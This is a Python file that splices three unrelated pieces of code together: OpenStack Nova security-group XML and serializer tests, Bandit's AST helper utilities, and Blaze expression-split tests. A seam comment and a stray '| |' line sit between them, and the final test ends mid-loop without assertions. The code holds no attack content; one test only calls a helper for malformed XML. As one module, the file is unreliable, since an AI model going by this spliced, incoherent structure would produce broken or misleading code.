        self.deserializer = security_groups.SecurityGroupXMLDeserializer()
    def test_create_request(self):
        serial_request = """
<security_group name="test">
   <description>test</description>
</security_group>"""
        request = self.deserializer.deserialize(serial_request)
        expected = {
            "security_group": {
                "name": "test",
                "description": "test",
            },
        }
        self.assertEquals(request['body'], expected)
    def test_create_no_description_request(self):
        """Omitted description element is omitted from the dict too."""
        serial_request = """
<security_group name="test">
</security_group>"""
        request = self.deserializer.deserialize(serial_request)
        expected = {
            "security_group": {
                "name": "test",
            },
        }
        self.assertEquals(request['body'], expected)
    def test_create_no_name_request(self):
        """Omitted name attribute is omitted from the dict too."""
        serial_request = """
<security_group>
<description>test</description>
</security_group>"""
        request = self.deserializer.deserialize(serial_request)
        expected = {
            "security_group": {
                "description": "test",
            },
        }
        self.assertEquals(request['body'], expected)
    def test_corrupt_xml(self):
        """Should throw a 400 error on corrupt xml."""
        self.assertRaises(
                exception.MalformedRequestBody,
                self.deserializer.deserialize,
                utils.killer_xml_body())
class TestSecurityGroupXMLSerializer(test.TestCase):
    """Tests dict-to-XML serialization of rules, groups, and group lists."""
    def setUp(self):
        super(TestSecurityGroupXMLSerializer, self).setUp()
        self.namespace = wsgi.XMLNS_V11
        self.rule_serializer = security_groups.SecurityGroupRuleTemplate()
        self.index_serializer = security_groups.SecurityGroupsTemplate()
        self.default_serializer = security_groups.SecurityGroupTemplate()
    def _tag(self, elem):
        """Strip and verify the XML namespace; return the local tag name."""
        tagname = elem.tag
        self.assertEqual(tagname[0], '{')
        tmp = tagname.partition('}')
        namespace = tmp[0][1:]
        self.assertEqual(namespace, self.namespace)
        return tmp[2]
    def _verify_security_group_rule(self, raw_rule, tree):
        """Check a serialized <rule> element against its source dict."""
        self.assertEqual(raw_rule['id'], tree.get('id'))
        self.assertEqual(raw_rule['parent_group_id'],
                         tree.get('parent_group_id'))
        # Track every child tag seen so nothing is missing or extra.
        seen = set()
        expected = set(['ip_protocol', 'from_port', 'to_port',
                        'group', 'group/name', 'group/tenant_id',
                        'ip_range', 'ip_range/cidr'])
        for child in tree:
            child_tag = self._tag(child)
            self.assertTrue(child_tag in raw_rule)
            seen.add(child_tag)
            if child_tag in ('group', 'ip_range'):
                for gr_child in child:
                    gr_child_tag = self._tag(gr_child)
                    self.assertTrue(gr_child_tag in raw_rule[child_tag])
                    seen.add('%s/%s' % (child_tag, gr_child_tag))
                    self.assertEqual(gr_child.text,
                                     raw_rule[child_tag][gr_child_tag])
            else:
                self.assertEqual(child.text, raw_rule[child_tag])
        self.assertEqual(seen, expected)
    def _verify_security_group(self, raw_group, tree):
        """Check a serialized <security_group> element and its rules."""
        rules = raw_group['rules']
        self.assertEqual('security_group', self._tag(tree))
        self.assertEqual(raw_group['id'], tree.get('id'))
        self.assertEqual(raw_group['tenant_id'], tree.get('tenant_id'))
        self.assertEqual(raw_group['name'], tree.get('name'))
        # Exactly two children: <rules> and <description>.
        self.assertEqual(2, len(tree))
        for child in tree:
            child_tag = self._tag(child)
            if child_tag == 'rules':
                self.assertEqual(2, len(child))
                for idx, gr_child in enumerate(child):
                    self.assertEqual(self._tag(gr_child), 'rule')
                    self._verify_security_group_rule(rules[idx], gr_child)
            else:
                self.assertEqual('description', child_tag)
                self.assertEqual(raw_group['description'], child.text)
    def test_rule_serializer(self):
        raw_rule = dict(
            id='123',
            parent_group_id='456',
            ip_protocol='tcp',
            from_port='789',
            to_port='987',
            group=dict(name='group', tenant_id='tenant'),
            ip_range=dict(cidr='10.0.0.0/8'))
        rule = dict(security_group_rule=raw_rule)
        text = self.rule_serializer.serialize(rule)
        tree = etree.fromstring(text)
        self.assertEqual('security_group_rule', self._tag(tree))
        self._verify_security_group_rule(raw_rule, tree)
    def test_group_serializer(self):
        rules = [dict(
                id='123',
                parent_group_id='456',
                ip_protocol='tcp',
                from_port='789',
                to_port='987',
                group=dict(name='group1', tenant_id='tenant1'),
                ip_range=dict(cidr='10.55.44.0/24')),
                 dict(
                id='654',
                parent_group_id='321',
                ip_protocol='udp',
                from_port='234',
                to_port='567',
                group=dict(name='group2', tenant_id='tenant2'),
                ip_range=dict(cidr='10.44.55.0/24'))]
        raw_group = dict(
            id='890',
            description='description',
            name='name',
            tenant_id='tenant',
            rules=rules)
        sg_group = dict(security_group=raw_group)
        text = self.default_serializer.serialize(sg_group)
        tree = etree.fromstring(text)
        self._verify_security_group(raw_group, tree)
    def test_groups_serializer(self):
        """Index template serializes a list of groups, two rules each."""
        rules = [dict(
                id='123',
                parent_group_id='1234',
                ip_protocol='tcp',
                from_port='12345',
                to_port='123456',
                group=dict(name='group1', tenant_id='tenant1'),
                ip_range=dict(cidr='10.123.0.0/24')),
                 dict(
                id='234',
                parent_group_id='2345',
                ip_protocol='udp',
                from_port='23456',
                to_port='234567',
                group=dict(name='group2', tenant_id='tenant2'),
                ip_range=dict(cidr='10.234.0.0/24')),
                 dict(
                id='345',
                parent_group_id='3456',
                ip_protocol='tcp',
                from_port='34567',
                to_port='345678',
                group=dict(name='group3', tenant_id='tenant3'),
                ip_range=dict(cidr='10.345.0.0/24')),
                 dict(
                id='456',
                parent_group_id='4567',
                ip_protocol='udp',
                from_port='45678',
                to_port='456789',
                group=dict(name='group4', tenant_id='tenant4'),
                ip_range=dict(cidr='10.456.0.0/24'))]
        groups = [dict(
                id='567',
                description='description1',
                name='name1',
                tenant_id='tenant1',
                rules=rules[0:2]),
                  dict(
                id='678',
                description='description2',
                name='name2',
                tenant_id='tenant2',
                rules=rules[2:4])]
        sg_groups = dict(security_groups=groups)
        text = self.index_serializer.serialize(sg_groups)
        tree = etree.fromstring(text)
        self.assertEqual('security_groups', self._tag(tree))
        self.assertEqual(len(groups), len(tree))
        for idx, child in enumerate(tree):
            self._verify_security_group(groups[idx], child)
# Fixed instance UUIDs used by the fake compute stubs below.
UUID1 = '00000000-0000-0000-0000-000000000001'
UUID2 = '00000000-0000-0000-0000-000000000002'
UUID3 = '00000000-0000-0000-0000-000000000003'
def fake_compute_get_all(*args, **kwargs):
    """Fake compute API get_all: two instances with two groups each."""
    return [
        fakes.stub_instance(1, uuid=UUID1,
                            security_groups=[{'name': 'fake-0-0'},
                                             {'name': 'fake-0-1'}]),
        fakes.stub_instance(2, uuid=UUID2,
                            security_groups=[{'name': 'fake-1-0'},
                                             {'name': 'fake-1-1'}])
    ]
def fake_compute_get(*args, **kwargs):
    """Fake compute API get: one instance (UUID3) with two groups."""
    return fakes.stub_instance(1, uuid=UUID3,
                               security_groups=[{'name': 'fake-2-0'},
                                                {'name': 'fake-2-1'}])
def fake_compute_create(*args, **kwargs):
    """Fake compute API create: ([instance], reservation_id) tuple."""
    return ([fake_compute_get()], '')
def fake_get_instances_security_groups_bindings(inst, context):
    """Fake bulk lookup of instance-uuid -> security-group-name bindings."""
    return {UUID1: [{'name': 'fake-0-0'}, {'name': 'fake-0-1'}],
            UUID2: [{'name': 'fake-1-0'}, {'name': 'fake-1-1'}]}
class SecurityGroupsOutputTest(test.TestCase):
    """Verifies security groups appear in server create/show/detail output.

    The XML subclass below overrides content_type and the encode/decode
    helpers, so all request/response handling goes through those hooks.
    """
    content_type = 'application/json'
    def setUp(self):
        super(SecurityGroupsOutputTest, self).setUp()
        self.controller = security_groups.SecurityGroupController()
        fakes.stub_out_nw_api(self.stubs)
        self.stubs.Set(compute.api.API, 'get', fake_compute_get)
        self.stubs.Set(compute.api.API, 'get_all', fake_compute_get_all)
        self.stubs.Set(compute.api.API, 'create', fake_compute_create)
        self.flags(
            osapi_compute_extension=[
                'nova.api.openstack.compute.contrib.select_extensions'],
            osapi_compute_ext_list=['Security_groups'])
    def _make_request(self, url, body=None):
        """Issue a GET (or POST when body is given) through the WSGI app."""
        req = webob.Request.blank(url)
        if body:
            req.method = 'POST'
            req.body = self._encode_body(body)
        req.content_type = self.content_type
        req.headers['Accept'] = self.content_type
        res = req.get_response(fakes.wsgi_app(init_only=('servers',)))
        return res
    def _encode_body(self, body):
        return jsonutils.dumps(body)
    def _get_server(self, body):
        return jsonutils.loads(body).get('server')
    def _get_servers(self, body):
        return jsonutils.loads(body).get('servers')
    def _get_groups(self, server):
        return server.get('security_groups')
    def test_create(self):
        url = '/v2/fake/servers'
        image_uuid = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'
        server = dict(name='server_test', imageRef=image_uuid, flavorRef=2)
        res = self._make_request(url, {'server': server})
        self.assertEqual(res.status_int, 202)
        server = self._get_server(res.body)
        for i, group in enumerate(self._get_groups(server)):
            name = 'fake-2-%s' % i
            self.assertEqual(group.get('name'), name)
    def test_show(self):
        url = '/v2/fake/servers/%s' % UUID3
        res = self._make_request(url)
        self.assertEqual(res.status_int, 200)
        server = self._get_server(res.body)
        for i, group in enumerate(self._get_groups(server)):
            name = 'fake-2-%s' % i
            self.assertEqual(group.get('name'), name)
    def test_detail(self):
        url = '/v2/fake/servers/detail'
        res = self._make_request(url)
        self.assertEqual(res.status_int, 200)
        for i, server in enumerate(self._get_servers(res.body)):
            for j, group in enumerate(self._get_groups(server)):
                name = 'fake-%s-%s' % (i, j)
                self.assertEqual(group.get('name'), name)
    def test_no_instance_passthrough_404(self):
        """A missing instance surfaces as a plain 404, not a 500."""
        def fake_compute_get(*args, **kwargs):
            raise exception.InstanceNotFound(instance_id='fake')
        self.stubs.Set(compute.api.API, 'get', fake_compute_get)
        url = '/v2/fake/servers/70f6db34-de8d-4fbd-aafb-4065bdfa6115'
        res = self._make_request(url)
        self.assertEqual(res.status_int, 404)
class SecurityGroupsOutputXmlTest(SecurityGroupsOutputTest):
    """Runs the JSON output tests above over the XML content type."""
    content_type = 'application/xml'
    class MinimalCreateServerTemplate(xmlutil.TemplateBuilder):
        """Serializer for the minimal <server> create request body."""
        def construct(self):
            root = xmlutil.TemplateElement('server', selector='server')
            root.set('name')
            root.set('id')
            root.set('imageRef')
            root.set('flavorRef')
            return xmlutil.MasterTemplate(root, 1,
                                          nsmap={None: xmlutil.XMLNS_V11})
    def _encode_body(self, body):
        serializer = self.MinimalCreateServerTemplate()
        return serializer.serialize(body)
    def _get_server(self, body):
        return etree.XML(body)
    def _get_servers(self, body):
        return etree.XML(body).getchildren()
    def _get_groups(self, server):
        # NOTE(vish): we are adding security groups without an extension
        #             namespace so we don't break people using the existing
        #             functionality, but that means we need to use find with
        #             the existing server namespace.
        namespace = server.nsmap[None]
        return server.find('{%s}security_groups' % namespace).getchildren()
# ---- end of embedded nova test module; bandit utility helpers follow ----
# -*- coding:utf-8 -*-
#
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import _ast
import ast
import os.path
import symtable
"""Various helper functions."""
def ast_args_to_str(args):
    """Format a sequence of AST argument nodes for issue/log output."""
    dumped = '\n\t\t'.join([ast.dump(arg) for arg in args])
    return '\n\tArgument/s:\n\t\t%s' % dumped
def _get_attr_qual_name(node, aliases):
    '''Get the full name for the attribute node.

    This will resolve a pseudo-qualified name for the attribute
    rooted at node as long as all the deeper nodes are Names or
    Attributes. This will give you how the code referenced the name but
    will not tell you what the name actually refers to. If we
    encounter a node without a static name we punt with an
    empty string. If this encounters something more complex, such as
    foo.mylist[0](a,b) we just return empty string.

    :param node: AST Name or Attribute node
    :param aliases: Import aliases dictionary
    :returns: Qualified name referred to by the attribute or name.
    '''
    if isinstance(node, _ast.Name):
        # Resolve a plain name through the import-alias table (single
        # lookup via .get instead of the membership-test-then-index pair).
        return aliases.get(node.id, node.id)
    elif isinstance(node, _ast.Attribute):
        name = '%s.%s' % (_get_attr_qual_name(node.value, aliases), node.attr)
        return aliases.get(name, name)
    else:
        # Dynamic constructs (subscripts, calls, ...) have no static name.
        return ""
def get_call_name(node, aliases):
    """Return the (alias-resolved) name of the callable in a Call node.

    :param node: AST Call node
    :param aliases: Import aliases dictionary
    :returns: Qualified callable name, or '' for dynamic callables
    """
    func = node.func
    if isinstance(func, _ast.Name):
        # Direct call of a plain name, e.g. open(...). Access func.id
        # directly instead of going through deepgetattr twice.
        return aliases.get(func.id, func.id)
    elif isinstance(func, _ast.Attribute):
        # Dotted call, e.g. os.path.join(...).
        return _get_attr_qual_name(func, aliases)
    else:
        # Lambdas, subscript results, etc. have no statically known name.
        return ""
def get_func_name(node):
    """Return the simple (unqualified) name of a FunctionDef node."""
    return node.name  # TODO(tkelsey): get that qualname using enclosing scope
def get_qual_attr(node, aliases):
    """Return 'prefix.attr' for an Attribute node, resolving import aliases.

    :param node: AST node (only Attribute nodes produce a result)
    :param aliases: import aliases dictionary
    :returns: dotted name, or "" for non-Attribute nodes
    """
    if type(node) != _ast.Attribute:
        return ""  # TODO(tkelsey): process other node types
    prefix = ""
    try:
        base = deepgetattr(node, 'value.id')
        prefix = aliases.get(base, base)
    except Exception:
        # NOTE(tkelsey): degrade gracefully when we cant get the fully
        # qualified name for an attr, just return its base name.
        pass
    return "%s.%s" % (prefix, node.attr)
def deepgetattr(obj, attr):
    """Recurse through a dotted attribute chain to get the ultimate value."""
    head, _, rest = attr.partition('.')
    value = getattr(obj, head)
    return deepgetattr(value, rest) if rest else value
def describe_symbol(sym):
    """Print a symtable Symbol's name and its active scope properties (debug aid)."""
    assert type(sym) == symtable.Symbol
    print("Symbol:", sym.get_name())
    props = ('referenced', 'imported', 'parameter',
             'global', 'declared_global', 'local',
             'free', 'assigned', 'namespace')
    for prop in props:
        if getattr(sym, 'is_' + prop)():
            print(' is', prop)
def lines_with_context(line_no, line_range, max_lines, file_len):
    '''Get affected lines, plus context.

    This function takes a list of line numbers, adds one line
    before the specified range, and one line after, to provide
    a bit more context. It then limits the number of lines to
    the specified max_lines value.

    :param line_no: The line of interest (trigger line)
    :param line_range: The lines that make up the whole statement
    :param max_lines: The maximum number of lines to output (0 means no
        output at all, negative means unlimited)
    :param file_len: Total number of lines in the file
    :return l_range: A list of line numbers to output
    '''
    # Catch a 0 max lines, don't display any code
    if max_lines == 0:
        return []
    l_range = sorted(line_range)
    # add one line before and after, to make sure we don't miss
    # any context.
    l_range.append(l_range[-1] + 1)
    l_range.append(l_range[0] - 1)
    l_range = sorted(l_range)
    if max_lines < 0:
        return l_range
    # limit scope to max_lines
    if len(l_range) > max_lines:
        # figure out a sane distribution of scope (extra lines after).
        # NOTE: floor division is required -- under Python 3, true
        # division would make 'after'/'before' floats and crash the
        # slice below with a TypeError.
        after = (max_lines - 1) // 2
        before = max_lines - (after + 1)
        target = l_range.index(line_no)
        # skew things if the code is at the start or end of the statement
        if before > target:
            extra = before - target
            before = target
            after += extra
        gap = file_len - (target + 1)
        if gap < after:
            extra = after - gap
            after = gap
            before += extra
        # find start
        if before >= target:
            start = 0
        else:
            start = target - before
        # find end
        if target + after > len(l_range) - 1:
            end = len(l_range) - 1
        else:
            end = target + after
        # slice line array
        l_range = l_range[start:end + 1]
    return l_range
class InvalidModulePath(Exception):
    """Raised when a file path cannot be mapped onto a python module name."""
def get_module_qualname_from_path(path):
    '''Get the module's qualified name by analysis of the path.

    Starting from the right-most directory component, every parent
    directory that contains an ``__init__.py`` is treated as a package
    and contributes a component to the module name; the walk stops at
    the first directory without one.  Note: the path is used as given
    (symlinks are not resolved here), so symlinked layouts may produce
    a name that differs from the import-time one.

    :param path: Path to module file. Relative paths are taken relative
        to the current working directory.
    :return: fully qualified module name
    :raises InvalidModulePath: when the directory or file part is missing
    '''
    (head, tail) = os.path.split(path)
    if not head or not tail:
        raise InvalidModulePath('Invalid python file path: "%s"'
                                ' Missing path or file name' % (path))
    parts = [os.path.splitext(tail)[0]]
    while head != '/':
        if not os.path.isfile(os.path.join(head, '__init__.py')):
            break
        (head, pkg) = os.path.split(head)
        parts.insert(0, pkg)
    return '.'.join(parts)
def namespace_path_join(base, name):
    '''Extend a namespace path with an additional name.

    Takes a namespace path (i.e., package.module.class) and extends it
    with an additional name (i.e., package.module.class.subclass),
    similar to how os.path.join works.

    :param base: (String) The base namespace path.
    :param name: (String) The new name to append to the base path.
    :returns: (String) The combined namespace path.
    '''
    return '.'.join((base, name))
def namespace_path_split(path):
    '''Split a namespace path around its last component.

    Similar to os.path.split: the tail is the last namespace component
    and the head is everything leading up to it.  A path with no dot
    yields a 1-tuple, matching ``str.rsplit`` behavior.

    :param path: (String) A namespace path.
    :returns: (Tuple of strings) The split path components.
    '''
    pieces = path.rsplit('.', 1)
    return tuple(pieces)
def safe_unicode(obj, *args):
    '''Return the unicode representation of obj.

    NOTE(review): Python 2 only -- relies on the ``unicode`` builtin and
    the 'string_escape' codec, neither of which exists on Python 3.
    '''
    try:
        return unicode(obj, *args)
    except UnicodeDecodeError:
        # obj is a byte string that cannot be decoded; escape it first so
        # the fallback conversion cannot fail
        ascii_text = str(obj).encode('string_escape')
        return unicode(ascii_text)
def safe_str(obj):
    '''Return the byte string representation of obj.

    NOTE(review): Python 2 only -- the fallback path uses the ``unicode``
    builtin, which does not exist on Python 3.
    '''
    try:
        return str(obj)
    except UnicodeEncodeError:
        # obj is unicode that cannot be encoded; escape it to plain ASCII
        return unicode(obj).encode('unicode_escape')
def linerange(node):
    """Get the line number range covered by a node, excluding child bodies.

    Nested statement lists (body/orelse/handlers/finalbody) are detached
    while walking so only the node's own header lines are counted, then
    reattached afterwards.  Returns ``[0, 1]`` when no line info exists.
    """
    saved = {}
    for field in ("body", "orelse", "handlers", "finalbody"):
        if field in dir(node):
            saved[field] = getattr(node, field)
            setattr(node, field, [])
    lines = {n.lineno for n in ast.walk(node) if hasattr(n, 'lineno')}
    for field, value in saved.items():
        # mirror the original restore rule: a None-valued field is left
        # as the empty list installed above
        if value is not None:
            setattr(node, field, value)
    if lines:
        return range(min(lines), max(lines) + 1)
    return [0, 1]
def linerange_fix(node):
    """Get a node's line range, compensating for multi-line strings."""
    # deal with multiline strings lineno behavior (Python issue #16806)
    lines = linerange(node)
    sibling = getattr(node, 'sibling', None)
    if sibling is not None and hasattr(sibling, 'lineno'):
        first = min(lines)
        if sibling.lineno - first > 1:
            # extend up to (but not including) the sibling's first line
            return range(first, sibling.lineno)
    return lines
def concat_string(node, stop=None):
    '''Builds a string from a ast.BinOp chain.

    This will build a string from a series of ast.Str nodes wrapped in
    ast.BinOp nodes. Something like "a" + "b" + "c" or "a %s" % val etc.
    The provided node can be any participant in the BinOp chain.
    Non-literal participants (names, calls, ...) are skipped and the
    string pieces are joined with single spaces.

    :param node: (ast.Str or ast.BinOp) The node to process
    :param stop: (ast.Str or ast.BinOp) Optional base node to stop at
    :returns: (Tuple) the root node of the expression, the string value
    '''
    def _get(node, bits, stop=None):
        # depth-first collection of leaf operands; recursive calls return
        # None, which is appended too but filtered out by the join below
        if node != stop:
            bits.append(
                _get(node.left, bits, stop)
                if isinstance(node.left, ast.BinOp)
                else node.left)
            bits.append(
                _get(node.right, bits, stop)
                if isinstance(node.right, ast.BinOp)
                else node.right)
    bits = [node]
    # climb to the root of the BinOp chain -- node.parent is not a stock
    # ast attribute; presumably added by the caller's AST preprocessing
    while isinstance(node.parent, ast.BinOp):
        node = node.parent
    if isinstance(node, ast.BinOp):
        _get(node, bits, stop)
    return (node, " ".join([x.s for x in bits if isinstance(x, ast.Str)]))
def get_called_name(node):
    '''Get a function name from an ast.Call node.

    An ast.Call node representing a method call presents differently to
    one wrapping a function call: thing.call() vs call(). This helper
    grabs the unqualified call name correctly in either case.

    :param node: (ast.Call) the call node
    :returns: (String) the function name
    '''
    target = node.func
    if isinstance(target, ast.Attribute):
        return target.attr
    return target.id
| |
from blaze.expr import *
from blaze.expr.split import *
from datashape import dshape
from datashape.predicates import isscalar, isrecord, iscollection
# Shared test fixtures: a 1-d tabular leaf and a 2-d array leaf.
t = symbol('t', 'var * {name: string, amount: int32, id: int32}')
a = symbol('a', '1000 * 2000 * {x: float32, y: float32}')
def test_path_split():
    """path_split keeps everything up to the last blockable sub-expression."""
    expr = t.amount.sum() + 1
    assert path_split(t, expr).isidentical(t.amount.sum())
    expr = t.amount.distinct().sort()
    assert path_split(t, expr).isidentical(t.amount.distinct())
    t2 = transform(t, id=t.id * 2)
    expr = by(t2.id, amount=t2.amount.sum()).amount + 1
    assert path_split(t, expr).isidentical(by(t2.id, amount=t2.amount.sum()))
    expr = count(t.amount.distinct())
    assert path_split(t, expr).isidentical(t.amount.distinct())
    expr = summary(total=t.amount.sum())
    assert path_split(t, expr).isidentical(expr)
def test_sum():
    """A sum splits into a keepdims per-chunk sum plus a scalar aggregate sum."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.sum())
    assert chunk.schema == t.schema
    assert chunk_expr.isidentical(chunk.amount.sum(keepdims=True))
    assert isscalar(agg.dshape.measure)
    assert agg_expr.isidentical(sum(agg))
def test_mean():
    """Mean splits into per-chunk (total, count) partials combined as total/count."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.mean())
    assert chunk.schema == t.schema
    assert chunk_expr.isidentical(summary(total=chunk.amount.sum(),
                                          count=chunk.amount.count(),
                                          keepdims=True))
    assert isrecord(agg.dshape.measure)
    assert agg_expr.isidentical(agg.total.sum() / agg.count.sum())
def test_var():
    """Variance splits into per-chunk (sum, sum-of-squares, count) partials."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.var())
    assert chunk.schema == t.schema
    assert chunk_expr.isidentical(summary(x=chunk.amount.sum(),
                                          x2=(chunk.amount**2).sum(),
                                          n=chunk.amount.count(),
                                          keepdims=True))
    assert isrecord(agg.dshape.measure)
    # combined as E[x^2] - E[x]^2
    assert agg_expr.isidentical((agg.x2.sum() / (agg.n.sum())
                                 - (agg.x.sum() / (agg.n.sum())) ** 2))
def test_std():
    """Std splits like var, with a sqrt applied in the aggregate step."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.std())
    assert chunk.schema == t.schema
    assert chunk_expr.isidentical(summary(x=chunk.amount.sum(),
                                          x2=(chunk.amount**2).sum(),
                                          n=chunk.amount.count(),
                                          keepdims=True))
    assert isrecord(agg.dshape.measure)
    assert agg_expr.isidentical(sqrt((agg.x2.sum() / (agg.n.sum())
                                      - (agg.x.sum() / (agg.n.sum())) ** 2)))
def test_sum_with_axis_argument():
    """An axis= argument is propagated to both chunk and aggregate sums."""
    chunk = symbol('chunk', '100 * 100 * {x: float32, y: float32}')
    (chunk, chunk_expr), (agg, agg_expr) = split(a, a.x.sum(axis=0), chunk=chunk)
    assert chunk.schema == a.schema
    assert agg_expr.dshape == a.x.sum(axis=0).dshape
    assert chunk_expr.isidentical(chunk.x.sum(axis=0, keepdims=True))
    assert agg_expr.isidentical(agg.sum(axis=0))
def test_sum_with_keepdims():
    """keepdims=True on the input survives into the aggregate expression."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount.sum(keepdims=True))
    assert chunk.schema == t.schema
    assert chunk_expr.isidentical(chunk.amount.sum(keepdims=True))
    assert isscalar(agg.dshape.measure)
    assert agg_expr.isidentical(sum(agg, keepdims=True))
def test_split_reasons_correctly_about_uneven_aggregate_shape():
    """Aggregate shape rounds up when chunks don't divide the leaf evenly."""
    x = symbol('chunk', '10 * 10 * int')
    chunk = symbol('chunk', '3 * 3 * int')
    (chunk, chunk_expr), (agg, agg_expr) = split(x, x.sum(axis=0),
                                                 chunk=chunk)
    # ceil(10 / 3) == 4 chunk rows along the reduced axis
    assert agg.shape == (4, 10)

    x = symbol('leaf', '1643 * 60 * int')
    chunk = symbol('chunk', '40 * 60 * int')
    (chunk, chunk_expr), (agg, agg_expr) = split(x, x.sum(),
                                                 chunk=chunk)
    # ceil(1643 / 40) == 42 partial results
    assert agg.shape == (42, 1)
def test_split_reasons_correctly_about_aggregate_shape():
    """Aggregate shape is (leaf shape / chunk shape) per reduced axis."""
    chunk = symbol('chunk', '100 * 100 * {x: float32, y: float32}')
    (chunk, chunk_expr), (agg, agg_expr) = split(a, a.x.sum(), chunk=chunk)
    assert agg.shape == (10, 20)

    chunk = symbol('chunk', '100 * 100 * {x: float32, y: float32}')
    (chunk, chunk_expr), (agg, agg_expr) = split(a, a.x.sum(axis=0), chunk=chunk)
    assert agg.shape == (10, 2000)
def test_distinct():
    """count(distinct) does per-chunk distinct, then distinct+count on the agg."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, count(t.amount.distinct()))
    assert chunk.schema == t.schema
    assert chunk_expr.isidentical(chunk.amount.distinct())
    assert isscalar(agg.dshape.measure)
    assert agg_expr.isidentical(count(agg.distinct()))
def test_summary():
    """summary splits into keepdims per-chunk partials re-combined with sums."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, summary(a=t.amount.count(),
                                                            b=t.id.sum() + 1))
    assert chunk.schema == t.schema
    assert chunk_expr.isidentical(summary(a=chunk.amount.count(),
                                          b=chunk.id.sum(), keepdims=True))
    # assert not agg.schema == dshape('{a: int32, b: int32}')
    # note: the scalar '+ 1' is applied only in the aggregate step
    assert agg_expr.isidentical(summary(a=agg.a.sum(),
                                        b=agg.b.sum() + 1))

    (chunk, chunk_expr), (agg, agg_expr) = \
        split(t, summary(total=t.amount.sum()))
    assert chunk_expr.isidentical(summary(total=chunk.amount.sum(),
                                          keepdims=True))
    assert agg_expr.isidentical(summary(total=agg.total.sum()))
def test_summary_with_mean():
    """A mean inside summary expands into <name>_total / <name>_count partials."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, summary(a=t.amount.count(),
                                                            b=t.id.mean() + 1))
    assert chunk.schema == t.schema
    assert chunk_expr.isidentical(summary(a=chunk.amount.count(),
                                          b_total=chunk.id.sum(),
                                          b_count=chunk.id.count(), keepdims=True))
    # assert not agg.schema == dshape('{a: int32, b: int32}')
    expected = summary(a=agg.a.sum(),
                       b=(agg.b_total.sum() / agg.b_count.sum()) + 1)
    assert agg_expr.isidentical(expected)
def test_complex_summaries():
    """Mixed mean/std/sum summaries expand into all needed named partials."""
    t = symbol('t', '100 * {a: int, b: int}')  # shadows the module fixture
    (chunk, chunk_expr), (agg, agg_expr) = split(t, summary(q=t.a.mean(),
                                                            w=t.a.std(),
                                                            e=t.a.sum()))
    assert chunk_expr.isidentical(summary(e=chunk.a.sum(),
                                          q_count=chunk.a.count(),
                                          q_total=chunk.a.sum(),
                                          w_n=chunk.a.count(),
                                          w_x=chunk.a.sum(),
                                          w_x2=(chunk.a**2).sum(),
                                          keepdims=True))
    expected = summary(e=agg.e.sum(),
                       q=agg.q_total.sum() / agg.q_count.sum(),
                       w=sqrt((agg.w_x2.sum() / agg.w_n.sum())
                              - (agg.w_x.sum() / agg.w_n.sum())**2))
    assert agg_expr.isidentical(expected)
def test_by_sum():
    """by-with-sum groups per chunk, then re-groups and sums the partials."""
    (chunk, chunk_expr), (agg, agg_expr) = \
        split(t, by(t.name, total=t.amount.sum()))
    assert chunk.schema == t.schema
    assert chunk_expr.isidentical(by(chunk.name, total=chunk.amount.sum()))
    assert not isscalar(agg.dshape.measure)
    assert agg_expr.isidentical(by(agg.name, total=agg.total.sum()))
def test_by_count():
    """by-with-count sums the per-chunk counts in the aggregate step."""
    (chunk, chunk_expr), (agg, agg_expr) = \
        split(t, by(t.name, total=t.amount.count()))
    assert chunk_expr.isidentical(by(chunk.name, total=chunk.amount.count()))
    assert agg_expr.isidentical(by(agg.name, total=agg.total.sum()))
def test_by_mean():
    """by-with-mean expands into per-chunk total/count grouped partials."""
    (chunk, chunk_expr), (agg, agg_expr) = \
        split(t, by(t.name, avg=t.amount.mean()))
    assert chunk_expr.isidentical(by(chunk.name,
                                     avg_total=chunk.amount.sum(),
                                     avg_count=chunk.amount.count()))
    assert agg_expr.isidentical(by(agg.name,
                                   avg=(agg.avg_total.sum() / agg.avg_count.sum())))
def test_embarassing_rowwise():
    """Elementwise expressions run entirely in the chunk; the agg is identity."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, t.amount + 1)
    assert chunk_expr.isidentical(chunk.amount + 1)
    assert agg_expr.isidentical(agg)
def test_embarassing_selection():
    """Row selections run entirely in the chunk; the agg is identity."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, t[t.amount > 0])
    assert chunk_expr.isidentical(chunk[chunk.amount > 0])
    assert agg_expr.isidentical(agg)
def test_embarassing_like():
    """Pattern-match filters run entirely in the chunk; the agg is identity."""
    (chunk, chunk_expr), (agg, agg_expr) = split(t, t.like(name='Alice*'))
    assert chunk_expr.isidentical(chunk.like(name='Alice*'))
    assert agg_expr.isidentical(agg)
# 2-d integer array fixture for the n-dimensional chunking tests below.
x = symbol('x', '24 * 16 * int32')
def test_nd_chunk():
    """A full reduction over 2-d chunks yields a (24/4, 16/4) partial grid."""
    c = symbol('c', '4 * 4 * int32')
    (chunk, chunk_expr), (agg, agg_expr) = split(x, x.sum(), chunk=c)
    assert chunk.shape == (4, 4)
    assert chunk_expr.isidentical(chunk.sum(keepdims=True))
    assert agg.shape == (6, 4)
    assert agg_expr.isidentical(agg.sum())
def test_nd_chunk_axis_args():
    """Axis reductions over 2-d chunks keep the non-reduced axis unchunked."""
    c = symbol('c', '4 * 4 * int32')
    (chunk, chunk_expr), (agg, agg_expr) = split(x, x.sum(axis=0), chunk=c)
    assert chunk.shape == (4, 4)
    assert chunk_expr.shape == (1, 4)
    assert chunk_expr.isidentical(chunk.sum(keepdims=True, axis=0))
    assert agg.shape == (6, 16)
    assert agg_expr.isidentical(agg.sum(axis=0))
    # same shape reasoning should hold for the compound reductions
    for func in [var, std, mean]:
        (chunk, chunk_expr), (agg, agg_expr) = split(x, func(x, axis=0), chunk=c)
